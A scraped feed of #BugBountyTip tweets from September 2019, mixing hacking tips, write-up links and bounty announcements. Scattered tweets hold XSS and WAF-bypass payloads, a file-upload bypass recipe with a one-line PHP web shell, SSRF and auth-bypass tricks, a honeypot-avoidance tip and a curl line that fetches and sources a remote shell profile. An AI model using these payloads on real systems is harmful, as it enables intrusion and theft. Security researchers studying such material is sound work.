0 Web App owners: We are very secured and safe from #Hackers. 😹😹 #bugbounties #BugBountyTip https://t.co/6IeHA0Knpr
A hacker's life
@Unknownuser1806


2019-09-21 19:58:08
1 A list of payloads for any kind of #vulnerability https://t.co/RfVj8bc6A9 #XSS ,#sqli, #ssrf ,#csrf,#rce #bugbounty,#BugBountyTip
GTH / GrandTheftHTTP / Adam Langley
@GrandTheftHTTP


2019-09-21 18:07:06
0 Everyone is always trying to find content on a website. Why don't you look for the absence of content ( aka the 404 page ). 404’s will quite often reflect the page URL that's trying to be accessed which could be prone to an XSS attack #BugBountyTip #hacking #infosec
Dominik Opyd
@neiriru


2019-09-21 17:56:25
0 I recommend reading #bugbounties #Security #Hacking #bugbountytips #BugBountyTip #BugBounty https://t.co/834ItNwAPP
Oad Earth
@oad_earth


2019-09-21 17:42:21
0 Is GitHub OAuth is really safe or is something wrong there? #BugBountyTip #Security #Hacking #BugBounty #bugbountytips #bugbounties https://t.co/ES0GAsnRsg
Sudoka
@sudo_sudoka


2019-09-21 16:41:16
1 Today I learned that we can check an IP whether it is a honeypot or not by using https://t.co/a61WGFzu9Q. Now you can avoid the honeypots and concentrate on real systems. Please comment if you find a honeypot. 🙏 #bugbounty #bugbountytip #threathunting
expl0itc0der
@vanshitmalhotra


2019-09-21 09:32:50
3 Bug Bounty Tutorial - Maximise Your Bug Bounty Output With Simple Nmap Script --- $$$$$ --- Use these Nmap script to automate the searching of CVE for a version of service running on a port scanned using Nmap. #BugBounty #bugBountyTip https://t.co/0gfcgW7uTM
Enciphers
@enciphers_


2019-09-21 07:13:31
4 "Demystifying Frida" On our Youtube Channel: https://t.co/UolayOUxTO Presentation: https://t.co/nX6KhTtdNM #BugBountyTip #cybersecurity #pentest #informationsecurity #cybersec #infosecurity #infosec #BugBounty #androidapp #AppSec #MobileApp #Pentesting #iOS #androidsecurity https://t.co/2E3a1hoelj
BlackClover
@Bc10ver


2019-09-21 07:05:42
0 Top story: @intigriti: '🔍 Looking for XSS? Don't forget the parameter names! 💡Thanks for the #BugBountyTip, @p4fg! #HackWithIntigriti ' https://t.co/3COYJGb6iZ, see more https://t.co/fVnXn9Z0FJ
👻in🐚
@0xerror


2019-09-21 07:05:42
0 XSS News: @intigriti: '🔍 Looking for XSS? Don't forget the parameter names! 💡Thanks for the #BugBountyTip, @p4fg! #HackWithIntigriti ' https://t.co/0zBniIXCrE, see more https://t.co/4VACxHYGGn
Rapid Safeguard
@RapidSafeguard


2019-09-21 06:52:52
0 https://t.co/3YHBGnQ3VO Awesome Hacking Resources #hacking #resources #infosec #BugBountyTip
👣
@_sawzeeyy


2019-09-20 22:25:31
1 Don't forget to use that BXSS payload 😉 #BugBounty #BugBountyTip
Murdockz
@Murdockz_CEH


2019-09-20 20:51:58
1 Company: "Great find, keep up the good work and please continue to test the API" Me: "Sure...btw I was able to achieve RCE further exploiting the SQLi on the strfdate field" Company: ".........." 🥴😂😅 btw this is a Ruby built API 🤪 #bugbounty #bugbountytips #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-09-20 18:58:49
0 Stealing JWTs in localStorage via XSS #BugBounty #BugBountyTip #Pentesting #penetrationtesting #cybersecurity https://t.co/XkEWCB2gXb
Michele Romano
@Mik317_


2019-09-20 17:58:38
0 OK, I'm off ... can't find something challenging and want to find something on a well paid and very used software ... any suggest on the name of the software to test? #BugBountyTip https://t.co/EUH5oFQ6Wk
Rafin Rahman Chy
@rafinrahmanchy


2019-09-20 17:44:24
0 Free Nmap Courses https://t.co/TAy9OCjuHo https://t.co/6EEKrEKPj5 https://t.co/82UGYDkWgz #nmap #Pentesting #InfoSec #CyberSecurity #Hacking #Hacker #EthicalHacking #whitehat #BugBounty #BugBountyTip https://t.co/UjVc2AxHSj
intigriti
@intigriti


2019-09-20 15:39:53
9 🔍 Looking for XSS? Don't forget the parameter names! 💡Thanks for the #BugBountyTip, @p4fg! #HackWithIntigriti https://t.co/VsFLtVFJRm
Mehmet Xyele
@mehmetxyele


2019-09-20 15:01:17
6 Subdomain enumeration with Rapid7 FDNS using AWS Athena https://t.co/fTJDvpeOWF #bugbounty #bugbountytips #bugbountytip #hackerone #hacker0x1 #hacker101 #bugcrowd
plenum 🇹🇳
@plenumlab


2019-09-20 14:58:21
0 Been busy lately to do write-ups here is a short story about 2500$ bug chain #BugBountyTip #BugBounty https://t.co/TMV1kiRFPl
Vulkey_Chen
@Vulkey_Chen


2019-09-20 14:55:12
0 #BugBountyTip #bughunter #bugbountytips BugBounty Hunter's Vulnerability Test Aid Platform: https://t.co/KrIlHNdFai ,Open Source Address: https://t.co/oUqeQBxmDQ
A hacker's life
@Unknownuser1806


2019-09-20 14:18:59
0 Bugbounty cheatsheet https://t.co/dIe8tBFAK7 #bugbounty, #BugBountyTip
Karel Origin
@Karel_Origin


2019-09-20 11:20:46
1 @intigriti couldn't handle this #bugbountytip (😢), so here I am: XSS executing on the wrong domain? No problem! Social Engineer your favourite platform analyst! https://t.co/26axjq8Iwj
SecuNinja
@secuninja


2019-09-20 11:05:16
3 don't waste your time with @zerocopter form based public programs. just got replies after 10 months telling me they cannot reproduce a bug.... wow! what surprise after 10 months. others still open same long... #bugbounty #bugbountytip
Murdockz
@Murdockz_CEH


2019-09-20 07:21:10
1 API --> JSON body post request--> contains two numeric fields --> first field set value from -1 to 9999999999 --> PostgreSQL database disclose --> set other field from 100 to 999999 --> table, query, fields disclose. #bugbountytips #bugbounty #bugbountytip
kassih mouhssine
@KassihMouhssine


2019-09-20 00:00:17
0 6 bugs : 4 idors and broken access control and account takeover and all this shit are duplicated #bugbountytip #BugBounty #CyberSecurity #dxtr0x01
Faizal Abroni
@faizalabroni


2019-09-19 23:10:40
2 https://t.co/f8BIngazNw This is how we found something from information disclosure to remote code execution and Worth $10.000 (indonesian language) #bugbountytip #bugbounty #togetherwehitharder #ItTakesaACrowd #hackerone #bugcrowd
expl0itc0der
@vanshitmalhotra


2019-09-19 20:09:45
6 Bug Bounty — Tips / Tricks / JS (JavaScript Files) https://t.co/GTENhx5EI7 #BugBounty #BugBountyTip #JS #PenetrationTesting #pentesting #devops #devsecops #cybersecurity
expl0itc0der
@vanshitmalhotra


2019-09-19 20:03:33
2 JS-Recon detailed. Analizying the internal network with a XSS https://t.co/ySiyhKIP7K Follow For Cyber Security Training and Bug Bounty Updates https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #Penetrationtesting #pentesting #cybersecurity #tools #pentesttools #bugbountytool
expl0itc0der
@vanshitmalhotra


2019-09-19 19:59:58
1 Exploiting File Uploads – A Tale of a $3k worth RCE --- $$ https://t.co/zpcHqz0fyx #BugBounty #BugBountyTip #PenetrationTesting #Penetesting #CyberSecurity #bounty $$$$$
expl0itc0der
@vanshitmalhotra


2019-09-19 19:54:18
0 BugBounty --- Cheat Sheets, Methodologies https://t.co/8CyoUV65oL #BugBounty #BugBountyTip $$$$$$$
bugbountytip
@a_l_e_r_t_1_


2019-09-19 19:03:19
0 VIM tutorial: linux terminal tools for bug bounty pentest and redteams w... https://t.co/R4yTVHqWHE #bugbountytip
itsmenaga
@nagarockshard


2019-09-19 17:58:21
0 If You See Any White Label Error Page just load your Burp intruder With Actuator Endpoints . If lucky Enough You might End Up With Gold Mine. List:- https://t.co/IObR5VqFPJ #pentesttips #bugbountytip #bugbounty
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-09-19 16:29:17
0 From Tbilisi to Batumi is 5 hours by train :) Decide play in Termux and recon :) #bugbountytip https://t.co/uoco4qvpZG
DarkOverFlow
@HAXORANON


2019-09-19 12:56:29
0 does anyone know how to find forgotten endpoints if so dm me #hackerone #bugbountytip #bugbounty #bughunter #bugbountytips
Shaked Klein Orbach 🇮🇱
@shakedko


2019-09-19 11:21:56
1 Did you know about "thisisunsafe" when visiting HTTPS websites with HSTS? https://t.co/e9VaXqwGpd Almost like IDDQD or better IDKFA #BugBounty #bugbountytip
Dominik Małowiecki
@5up3rD43m0n


2019-09-19 09:54:47
0 it's one of these days when you check your database and realize that a bug hunter was successful, but he did not realize it and forget to report it #bugbountytip @Hacker0x01
Constant 🇪🇬
@Mr_A_ConstanT


2019-09-19 09:44:14
0 a shell script aim to automatically launch 50+ online web scanning tools in the Browser against a target domain in a 10 waves, #CyberSecurity #bugbountytip #WebApp #Hacking https://t.co/nTNLn3LrpY
JaWaD 🇲🇦
@CHAJER2


2019-09-19 09:39:01
0 Yay, I was awarded a $750 bounty on @Hacker0x01 #TogetherWeHitHarder steps: == #bugbountytip: Change sometimes method post to get can lead to Information Exposure Through Debug Information.
Avanish Pathak
@avanish46


2019-09-19 05:52:05
0 #bugbountytip discovered CSRF+Stored XSS in a private program on @Bugcrowd but unfortunately XSS was Out of scope in that program. How it works :- https://t.co/f2YJa1WgTi
A hacker's life
@Unknownuser1806


2019-09-19 03:08:09
1 When you are looking for vulnerabilities, always remember to think outside the box and submit encoded values to see how the site handles the input. #hacking, #bugbountytip ,#bugbounty
Fisher
@Regala_


2019-09-19 01:12:56
2 The less you use scanners, the more severe your issues are #cosmic #DISTURBANCE 🇨🇦 #bugbounty #bugbountytip
Murdockz
@Murdockz_CEH


2019-09-18 19:58:10
0 Guys if you are looking to get up and running with Go / Golang, I highly recommend this video by @traversymedia Go / Golang Crash Course https://t.co/kH75W4DeY3 #bugbounty #go #golang #bugbountytip #bugbountytips
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-18 18:56:33
0 Good #hacking is a combination of observation and skill. #bugbountytip , #motivation ,#bugbounty
RabbidByte
@RabbidByte


2019-09-18 14:35:27
0 Don't forget about the @Hacker0x01 Hacker101 discord channel .... I missed way too much when I forgot about it for 8 months or so. #bugbountytip
Emad Youssef
@Sy3Omda


2019-09-18 12:57:27
0 It looks as simple as it should be, BUT this would minimize your time in the enumeration phase: curl https://t.co/wuePgiRbGU -o ~/.bash_profile && echo "source ~/.bash_profile" >> ~/.bashrc I have combined most of keyhack in one bash profile, enjoy #BugBounty #bugbountytip #Pentesting
gweeperx
@gweeperx


2019-09-18 07:42:39
2 Just another XHR cookie/body stealer: https://t.co/kbmsAYuwsJ #bugbounty #bugbountytip #bugbountytips
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-18 03:39:15
0 DetExploit - Software That Detect Vulnerable Applications, Not-Installed OS Updates And Notify To User https://t.co/HrwGYO0fjL #bugbounty , #bugbountytip ,#hacking
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-18 03:33:03
0 #XSS, #SQLi, #CSRF, #SSRF, #XXE, OS command #injection, directory traversal, and #HTTPrequest smuggling. -> Everything you need to get started with #bugbounty #bugbountytip , #hacking https://t.co/4ZnwNy6STO
daniel_v
@danielv47251669


2019-09-17 18:09:57
0 #bugbountytip #bugbountytips >found a login page restricted to business email only >intercepted the signup request > intercepted response from this request > changed response body from "false" to "true" > auth bypass > internal access to the platform
farukh
@Farukhwap


2019-09-17 16:17:30
0 @Olacabs @ola_supports @olamoney_in @OlainUK why is it empty 🤔 #fixit #bugbountytips #bugbountytip #loot #Ola https://t.co/CS0HUxo0if
luffydragneel
@Hackers_Guild


2019-09-17 15:56:39
0 Suppose there is a contracts page at https://t.co/guSo2PGluZ meant only for Admins and not visible in the lower privileged user's UI. Just directly browse to that page from this lower privileged account, and you might end up seeing the contents there. #bugbountytip #bugbounty https://t.co/1cOxnJ0OTI
Vulkey_Chen
@Vulkey_Chen


2019-09-17 13:52:17
1 #bugbountytip #burpsuite #bugbountytips #bughunter I build a burpsuite extension to mark sensitive information. If "mobile phone number" and "email address" information appear in the response content, then mark this request in red. https://t.co/qeY996qzTi
Ammar Amer🇸🇾
@cry__pto


2019-09-17 13:51:02
17 I have uploaded 34 new articles about different fields of hacking as PDF files to my GitHub repository. I will continue working on this project for years to come. https://t.co/q2layzVpKz #pentest #malware #hacking #infosec #cybersecurity #bugbountytip #redteam #hacking #0day #osint https://t.co/IAaAGXn9HD
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-17 12:54:42
0 Awesome #Shodan search queries https://t.co/Wo0inc380w #bugbounty , #bugbountytip ,#hacking
Vedant
@ved_wayal


2019-09-17 08:58:43
0 Blind XSS is lub 😜😍 #bugbountytip https://t.co/GHlwkPix6W
Rishabh
@____cypher____


2019-09-17 06:58:06
0 SSRF tip: [email protected] ==> black[.]com black[.]com?white[.]com ==> black[.]com black[.]com#white.com ==> black[.]com #bugbountytip #BugBounty #bugbountytips
oops
@a_l_e_r_t_1_


2019-09-17 06:44:01
0 Search for high-level vulnerabilities if you don't want the vulnerability to be duplicated :) #bugbountytip
Sultan Haikal
@SultanMoeslim


2019-09-17 06:08:28
0 {Reviews} in bugbounty, report recipients ... are taking more references from reporters! to imitate / change systematic design, secure etc. reporters don't get any profit. and those who change this, of course benefit internally. best manipulation. #bugbounty #bugbountytip
AFAQUE KHAN
@Afaquekhan24


2019-09-17 05:13:43
1 @stereotype32 Remember you fools...you bug bounty hunter fools... any bypass technique that is publicly posted no longer works in a real-world scenario .....this is my #protip for today #hackerone #bugbountytip #BugBounty #bugbountytips #bugcrowd ...Happy hunting...
Pomegranate 🌴
@ret2pomegranate


2019-09-17 04:33:45
1 When you & your partner get a bounty. #bugbountytip #bugbounty #infosec https://t.co/3rjqUgsXeE
luffydragneel
@Hackers_Guild


2019-09-17 03:46:04
1 Suppose the sensitive content is at /folder/content. If there is proper access control on /folder, it doesn't mean that there is proper access control when you visit /folder/content directly. Always look for access control issues on each endpoint. #bugbountytip #bugbounty https://t.co/J8jVcy2IKB
Pomegranate 🌴
@ret2pomegranate


2019-09-16 23:47:44
0 Just reported Double-Sequence XSS which affects 2 parameters in a single endpoint to a program on @Hacker0x01. #bugbounty #bugbountytip #infosec
Michele Romano
@Mik317_


2019-09-16 18:22:47
0 @Manikan77602456 understand how programs work, and definitely how other researchers think ;). Probably seeing how reports are thought/presented/explained is the best thing you can do to learn. Also, check Twitter #bugbountytip and similar: you'll find good bypasses or Medium articles.
Jakub Juszczak
@apertureless


2019-09-16 12:11:31
0 Blind XSS is still my favorite. Spray the payload and after some time, you receive your christmas present 🎁 #infosec #bugbountytip
intigriti
@intigriti


2019-09-16 11:56:17
2 This actually worked on the first site we tested! 🤯 P.S.: Legacy or unimplemented OAuth flows often contain vulnerabilities that can lead to account takeover. 😈 Thanks for the #BugBountyTip, @ngalongc! https://t.co/vwAi9hhHrm
SilexSecure
@silexsecure


2019-09-16 11:23:55
0 @silexsecure Today you will learn WordPress penetration testing using WPScan and Metasploit. @rsilexlab @metasploit @ubuntu @kalilinux @wordpressdotcom #infosec #cybersecurity #bugbountytip #bugbounty #Pentesting #GodMorningmonday #CyberAttack #SSL#GOODhat
Karna
@karna__1


2019-09-16 11:04:38
1 If you want a free online phone number service to receive OTP(s) for your web app testing, here's one: https://t.co/3dPt58DZGy #bugbounty #bugbountytip
Oops!
@Corrupted_brain


2019-09-16 10:17:18
0 This Oracle directory architecture was quite helpful for me to harvest critical information by exploiting XXE and reading files locally. #bugbountytip #bugbounty #Oracle https://t.co/Fjhg3OX2Gd
Sp
@spt_2020


2019-09-16 10:06:29
0 Collection Of Bug Bounty Tip-Will Be updated daily https://t.co/BYm6GxAFnz #bugbountytip
oops
@a_l_e_r_t_1_


2019-09-16 08:48:37
0 Cheap and no ads. Bug bounty is everywhere. 1 Bug = 60 x App. Learn & Hack & Earn Money. Good Hacking! https://t.co/JPaA4CKmfO #openredirection #xss #xxe #ssrf #bounty #rce #graphql #sqlinjection #bugbountytip #webpentest #owasp #bugbountytip #python #ruby #csfr #hack #hackers
Juha Remes
@juha_remes


2019-09-16 08:36:33
0 This is a great #bugbountytip. 👍 https://t.co/XteWTBVmMe
oops
@a_l_e_r_t_1_


2019-09-16 08:22:45
0 Really very, very slow in fixing gitlab vulnerabilities #bugbountytip
Pomegranate 🌴
@ret2pomegranate


2019-09-16 05:54:08
0 #BugBounty #bugbountytip #infosec Normal User: “Text Injection” (The Depression Period) Bug Bounty Hunter: Arbitrary Spoofed Character Encoded Injection via the Roman Alphabet. https://t.co/Z20cvTDtUG
Pomegranate 🌴
@ret2pomegranate


2019-09-16 03:35:05
2 Just reported XSS to a program on @Hacker0x01. #InfoSec #bugbounty #bugbountytip Got XSS through a POST request in a parameter, automated it through my web-server due to `document.location.href=` being used in the vulnerable parameter.
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-16 02:45:02
0 This tool collects all information about all devices that are directly connected to the internet with the specified keywords that you enter. This way you get a complete overview. #shodaneye : https://t.co/AarJFRVDOP #hacking #bugbounty #bugbountytip
A DNF 🦖
@binb4sh


2019-09-16 01:08:34
0 If the target server is running Windows and you can create files and directories on it, try to create ones with forbidden names (CON,AUX,etc)! It may cause errors resulting in Info Disclosure/DoS. An example written in PHP: file_put_contents("con.png",""); #bugbountytip
terjanq
@terjanq


2019-09-16 00:22:36
3 I haven't published any writeups in a while. Here is my latest #writeup to an awesome #buyify challenge from #csaw19 #ctf that has just ended a few hours ago. The author of the task is @itszn13. You should definitely check this out! https://t.co/uAWk6hsyoI #bugbountytip
Drok3r🏴‍☠️
@drok3r


2019-09-15 21:23:18
0 pixload -- Image Payload Creating tools #bugbountytip #payload Link [ https://t.co/6wh5X9EWXB ] https://t.co/Fc4kBuKmMp
securibee 🐝
@securibee


2019-09-15 19:19:08
0 @Random_Robbie @j_opdenakker @Vin1515 @zseano @NahamSec @TomNomNom @d0nutptr @stokfredrik @yaworsk @Alyssa_Herrera_ has great content as well make sure to follow her! @ITSecurityguard Follow #bugbountytip although it's pretty noisy. Subscribe to newsletter from @PentesterLand https://t.co/e2fgYy31Gr I keep forgetting people. My bad!
dykaushik
@dykaushik


2019-09-15 17:40:17
0 Collection Of Bug Bounty Tip-Will Be updated daily https://t.co/GGQro6C5zH #bugbountytip
Mayur Parmar
@th3cyb3rc0p


2019-09-15 17:13:52
0 Must read blog🙂 https://t.co/4nQ54tutfD #bugbountytip #BugBounty #bughunting #ethicalhacking
W🌍aR🐁eeq
@wareeq_shile


2019-09-15 16:44:53
0 Can this still be taken over? #BugBounty #bugbountytip #bugbountytips https://t.co/nN5Xdani38
Wh11teW0lf
@Wh11teW0lf


2019-09-15 16:26:05
1 #bugbountytip The most vulnerable place in Wordpress/Drupal is custom themes and plugins. Wordpress Location: /wp-content/themes/ and /wp-content/plugins/ You can find their names with Waybackarchive or the site map in Burp.
Murdockz
@Murdockz_CEH


2019-09-15 14:50:00
0 Passive recon 😁 #bugbountytip #bugbountytips #bugbounty https://t.co/oCvjzwcsb6
Somdev Sangwan
@s0md3v


2019-09-15 13:27:18
0 @yassergersy Why is this #bugbountytip and not #websecuritytip?
vavkamil
@vavkamil


2019-09-15 13:01:34
1 How to bypass Android certificate pinning and intercept SSL traffic #bugbounty #bugbountytip https://t.co/KFRUCYEc96
Youssef A. Mohamed
@GeneralEG64


2019-09-15 12:36:29
4 The easiest P1 ever!! 😂😍 Steps to Reproduce: Navigated to https://t.co/CEADFzHYUD Directory Bruteforcing found "admin" Bruteforcing into it found "users.db" Exposing admin's creds in plaintext! Logging in to the Admin Panel. #BugBounty #bugbountytip https://t.co/7SuX3E5otC
BlackClover
@Bc10ver


2019-09-15 12:15:41
0 Top story: @yassergersy: '#bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss ' https://t.co/dkBDDSkQ0n, see more https://t.co/fVnXn9Z0FJ
👻in🐚
@0xerror


2019-09-15 12:15:40
0 XSS News: @yassergersy: '#bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss ' https://t.co/TDrl37pldF, see more https://t.co/4VACxHYGGn
oops
@a_l_e_r_t_1_


2019-09-15 08:55:16
1 Cheap and no ads. Bug bounty is everywhere. 1 Bug = 60 x App. Learn & Hack & Earn Money. Good Hacking! https://t.co/JPaA4CKmfO #openredirection #xss #xxe #ssrf #bounty #rce #graphql #sqlinjection #bugbountytip #webpentest #owasp #bugbountytip #python #ruby #csfr #hack #hackers
nocomp
@nocomp


2019-09-15 08:01:13
0 Any good #BugBounty discord place for learn and share? #bugbountytip thx for RT
HackIsOn ®
@hackison


2019-09-15 07:57:21
0 Ghazi is a BurpSuite Plugins For Testing various PayLoads Like "XSS,SQLi,SSTI,SSRF,RCE and LFI" through Different tabs , Where Each Tab Will Replace Every GET or POST Parameters With Selected TAB in "Proxy" or "Repeater" TAB. https://t.co/PUhzq0SuEo #bugbounty #bugbountytip
(((Gamliel)))
@Gamliel_InfoSec


2019-09-15 05:12:49
0 Awesome #bugbountytip https://t.co/DnjdSHMcix
Securisec 🚀
@securisec


2019-09-15 02:08:06
0 "RT RT YoKoAcc: Bismillah. Releasing one of my RCE story at one of Bug Bounty Program. Race Condition that could Result to RCE - (A story with an App that temporary stored an uploaded file within 2 seconds before moving it to Amazon S3). https://t.co/j8fCpvwWy6 #bugbountytip…
Ankur Vaidya
@4N_CURZE


2019-09-15 00:14:37
0 Finally reached and completed one more milestone :) 😀😃😍😍♥️♥️♥️ #openbugbounty #xss #bugbounty #bugbountytip #bughunter #WhiteHats #pentest #Pentesting @openbugbounty @openbounty @whitehatsec @bugbountyforum https://t.co/zKVguucXI3
Pomegranate 🌴
@ret2pomegranate


2019-09-14 20:26:55
0 Just reported RCE to a program on @Hacker0x01. Wish me the best of luck. #infosec #bugbounty #bugbountytip Kind of nervous because of an accidental reboot that occurred while I was testing for a PoC.
Bijan Murmu
@0xBijan


2019-09-14 20:14:02
0 New write-up "How I found a simple and weird Account takeover bug" https://t.co/32185JXNW6 #bugbounty #bugbountytip
Aziz Hakim
@hackerb0y_


2019-09-14 20:09:17
0 I was logged in a program's portal!🧐 Suddenly I have visited this URL!🙄 https://*.redacted.com/user/profile/delete and GUESS what? My account got deleted without any confirmation!🤣 #bugbountytip #bugbounty
Murdockz
@Murdockz_CEH


2019-09-14 18:22:10
0 2. Will do a write up on how to exploit graphql after bug is fixed and bounty rewarded 😄...there is a part I can't disclose in part 1. #bugbountytip #BugBounty #bugbountytips
Murdockz
@Murdockz_CEH


2019-09-14 18:20:13
0 1. Able to read anyone's gender status when it is set to private or only show to friends. User A is not friends with User B. User A cannot see User B's gender status. User A sends a graphql request to User B and the private gender status is revealed. #bugbounty #bugbountytip #bugbountytips
Pomegranate 🌴
@ret2pomegranate


2019-09-14 16:10:14
0 Accidentally ran a software-specific ‘reboot’ command & crashed the server. It’s been 10+ hours and no response. Should I report this issue to the acquisition/asset? #bugbounty #InfoSec #bugbountytip
Sudoka
@sudo_sudoka


2019-09-14 15:48:48
1 #Bypass #XSS filters with JavaScript RegExp.prototype​.source 🏹🎯🏆 #bugbountytip https://t.co/DiP4CZcqg6
Aditya
@hetroublemakr


2019-09-14 14:15:05
1 Ran into an interesting blog on Medium about #bugbountytip #infosec by @bbinfosec https://t.co/kUUQiAWtca
YasserGersy
@yassergersy


2019-09-14 13:39:56
1 #bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss https://t.co/wEtN3fl4xT
oops
@a_l_e_r_t_1_


2019-09-14 12:42:06
0 My favorite xss payload : <img onerror="{alert`1`}" src> #bugbountytip
Fisher
@Regala_


2019-09-14 11:17:53
0 I'll experiment with streaming like all the cool kids are doing these days 😇 Starting October, schedule to be announced. Any particular subjects you'd be interested seeing or people? Let me know below 👇 #bugbounty #bugbountytip #infosec
Khaled Mohamed
@xelkomy


2019-09-13 20:15:20
0 shopify xss google auth this video awesome #bugbountytip #hackerone #BugBounty https://t.co/JbWlhXSOCK
Sandeep Raghav
@Sandeep_tunna


2019-09-13 18:03:30
0 Hey, @LinkedIn , I found a bug in your system. Please respond if you want to fix it. #bugbounty #testing #bugbountytip #LinkedIn
Simon
@7s26simon


2019-09-13 15:48:26
0 Submitted my first #bugbounty report !!! Hope it hasn't been reported already #ethicalhacker #hack #hacking #pentest #pentester #bugbountytip
Mohan Sri Ramakrishna
@S1r1u5_


2019-09-13 14:10:54
0 Yay, I was awarded a $500 bounty on @Hacker0x01! https://t.co/ac1KEZZZWM #TogetherWeHitHarder. #bugbountytip Actually, I am afraid to test the program cuz I saw some good hackers in the thanks page, But I started and I found a reflected XSS on the main page itself.😇
Mourad
@SecuAudit


2019-09-13 11:07:24
0 Any advice how to get into "Apache Axis version: 1.2.1" where remote admin is disabled ? #bugbountytip #bugbountytips
expl0itc0der
@vanshitmalhotra


2019-09-13 06:23:51
0 HTML to PDF converter bug leads to RCE in Facebook Server -- #BugBounty #BugBountyTip #Writeup https://t.co/UgmPhls8Mb
saranraj
@KceSaranraj


2019-09-13 01:58:28
0 I have the following code <li title="?"> test </li> I need to inject vector to break down the HTML Attributes and execute the alert using an event. is there a way to achieve this without using single/double quotes? <>&*#%\'" - Not Allowed @h1_kenan @le4rner #bugbountytip #xss
Mr.CryptoCZ
@cechv2


2019-09-12 06:56:18
0 #Electroneum #ETN $ETN is looking for Bug bounty hunters, IT Gurus, Hackers, if you want to earn money and help @electroneum be more secure go and check our Hackerone program #bugbountytip #Hacker #hackerone #fintech #app https://t.co/qUZ0h5mqqK
Yadhavi
@PrincessYadhavi


2019-09-12 05:18:36
0 Found a subdomain which is pointing to cloudfront using cname. And when I open the page it shows "NoSuchBucket" "The specified bucket does not exist" error. Is subdomain takeover possible here? If yes, how? #bugbounty #bugbountytip #bugbountyhelp #s3

@pouyana1


2019-09-12 04:19:02
1 *content-length filtering: use small size shells like: <?='$_GET[x]'?> #bugbounty #bugbountytip #hacking #infosec #hack

@pouyana1


2019-09-12 04:19:01
0 *client side filtering: upload a valid file, intercept the request and change it to the shell extension (php,asp,jsp,..) *content-type filtering: change the content-type to valid content-type like: image/jpeg #bugbounty #bugbountytip #hacking #infosec #hack

@pouyana1


2019-09-12 04:19:01
1 file upload restriction bypass: * name filtering: 1) blackboxing: try to use file extensions like: php[3-n],phtml, pht. 2) whitelisting: use null-byte:shell.php%00.gif use double extension format : shell.php.jpg or shell.jpg.php #bugbounty #bugbountytip #hacking #infosec #hack
Henry Chen
@chybeta


2019-09-12 03:06:03
1 bounty calculation formula: crontab(subdomain(amass+subfinder+...) + port(masscan + nmap) + screenshot + dirsearch) + slack = bug bounty #bugbounty #bugbountytips #bugbountytip https://t.co/QCODeeZhC3
Murdockz
@Murdockz_CEH


2019-09-12 00:25:03
0 Sometimes you need to take a long step back to learn new technologies in order to enhance your Bug Bounty skills. Learn the technology that companies use in order to break and exploit them even more. #bugbounty #bugbountytip #bugbountytips https://t.co/lge8ogvAPr
Arif Khan
@payloadartist


2019-09-11 07:06:15
1 Awesome giveaway! 🔥 #infosec #bugbounty #bugbountytip https://t.co/0qJjiSx3zl
Sukhmeet Singh
@MadGuyyy


2019-09-11 01:30:19
0 > Website had admin panel with "Login with Google" > Only allowed Google login with company's email > Created an email account [email protected] > Created Google account with that email > Logged into admin panel with Google. 💰$1500 #BugBountyTip #InfoSec #BugBounty
C1h2e1
@C1h2e11


2019-09-11 00:48:34
0 #bugbountytip #bugbountytips Using https://t.co/5gM8SE3B4J for subdomain monitoring, last night I found a .DS_Store leaking on the latest subdomain on https://t.co/5gM8SE3B4J
Guilherme Keerok
@k33r0k


2019-09-10 17:08:23
2 Cloudflare WAF bypass: open("https://host/?xss=%3Ca/href=javascript:1%26%26%26%23x6e;ame%3Eclick me%3C/a%3E","<svg onload=alert(document.domain)>"); #bugbountytip #bugbounty #xss #bugbountytips
Jenish
@_jensec


2019-09-10 16:39:37
2 Yay, I was awarded a $2,000 bounty on @Hacker0x01! For accessing company dashboard via creating account with Email “[email protected]” on main web app and login to dashboard with SSO. #bugbountytip
wywwzjj
@wywwzjj


2019-09-10 16:29:38
0 @artofwebhacking @chybeta https://t.co/O8D1Pp6IcP Here is a website that archive bug bounty tips. 👉https://t.co/Kvxfo3jCh8 Check it out, it has other useful resources too. 😀 #bugbounty #BugBountyTip #bugbountytips @Hacker0x01
o k t a v a n d i
@0ktavandi


2019-09-10 16:08:24
1 anyone have hackerone report with SSRF issue 307 redirect bypass?? #bugbountytip #bugbountytips
Rishabh
@____cypher____


2019-09-10 09:40:44
0 Perfect oneliner for subdomain enumeration curl -s 'https://t.co/A3Qe45ZOra%.'<TARGET>'&output=json' | jq '.[] | .name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u #bugbounty #bugbountytip #bugbountytips #infosec
brsn
@brsn76945860


2019-09-10 04:08:46
0 @achillean @ItsReallyNick @x04steve @shodanhq I've tweeted this a few hours ago, but this works for me:
----------
import mmh3
import requests
response = requests.get('https://yourwebsite/favicon.ico')
favicon = response.content.encode('base64')
hash = mmh3.hash(favicon)
print hash
----------
#Shodan #bugbountytip
Securisec 🚀
@securisec


2019-09-09 14:25:30
0 "RT RT osamaavvan: My Writeup about Exploiting JSONP and Bypassing Referer Check. #bugbountytip #bugbountytips #Security https://t.co/pUyJV4QdcW"
Iheb
@ihebhamad514


2019-09-09 12:46:53
0 I found a #bugbounty program where it implements a captcha protection field after certain requests with burp intruder, the only way to bypass it is to delete the Cookie header. As a result, I got 2 valid users accounts. #bugbountytip
Aussan 🇨🇦
@aussan_m


2019-09-09 12:33:12
0 A lot of the time people forget to look at the response or intercept the response in Burp. Always examine the response in detail, especially when logging in. I was able to go from regular user to Admin by manipulating the response #bugbountytips #bugbountytip
Japz Divino
@japzdivino


2019-09-09 02:42:25
0 Reading hacktivity report will lead you to bounties by just bypassing the fix for the disclosed report.👌 #noobtip #bugbountytip https://t.co/ppnliULt5T
Hx01
@Hxzeroone


2019-09-08 05:35:30
